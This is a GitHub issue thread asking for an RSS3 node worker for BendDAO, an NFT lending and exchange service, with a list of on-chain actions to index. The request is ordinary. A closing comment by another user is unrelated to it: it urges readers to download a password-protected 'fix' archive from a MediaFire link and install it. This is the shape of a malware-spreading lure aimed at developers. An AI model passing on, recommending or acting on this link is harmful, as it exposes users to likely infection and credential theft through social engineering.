### ISSUE TITLE
benddao

### ISSUE THREAD

**Issue by Candinya** [RSS3-Network/Node#479]
### Tag

Exchange

### Project URL

https://www.benddao.xyz/

### Worker description

Liquidity for NFTs - Use NFTs as collateral to borrow liquidity or deposit to earn yields instantly!

### What actions should be included?

1. TakerAsk
2. TakerBid

1. Deposit
2. Withdraw
3. Borrow
4. Repay
5. Auction
6. Redeem
7. Liquidate

### Additional description

This is for V1, new worker for V2 can be created as a new worker later

### This is not a duplicated worker request

- [X] I have searched [existing issues](https://github.com/rss3-network/node/issues) and [pull requests](https://github.com/rss3-network/node/pulls) to ensure this worker has not already been requested

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
